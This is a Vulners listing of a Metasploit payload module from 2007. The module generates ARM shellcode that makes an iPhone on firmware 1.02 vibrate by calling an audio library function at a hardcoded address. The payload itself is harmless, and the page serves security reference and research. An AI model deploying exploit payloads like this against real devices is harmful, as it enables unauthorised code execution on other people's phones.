Lucene search
K

Apple iOS iPhone Vibrate

🗓️ 25 Sep 2007 04:21:48Reported by hdm <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 59 Views

Apple iOS iPhone Vibrate module for causing the iPhone to vibrate using the AudioToolkit library

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule

  CachedSize = 16

  include Msf::Payload::Single
  include Msf::Payload::Osx

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Apple iOS iPhone Vibrate',
      'Description'   => %q|
        Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded.
        Based on work by Charlie Miller <cmiller[at]securityevaluators.com>.
      |,
      'Author'        => 'hdm',
      'License'       => MSF_LICENSE,
      'Platform'      => 'osx',
      'Arch'          => ARCH_ARMLE))
  end

  def generate(_opts = {})
    [
      0xe1a00820, #  mov r0, r0, lsr #16
      0xe51ff004, #  ldr pc, [pc, #-4]
      0x319ef974, #  _AudioServicesPlaySystemSound() / Firmware 1.02
      0x03ea4444  #  Parameter: 0x03ea
    ].pack("V*")
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Nov 2022 02:10Current
7High risk
Vulners AI Score7
59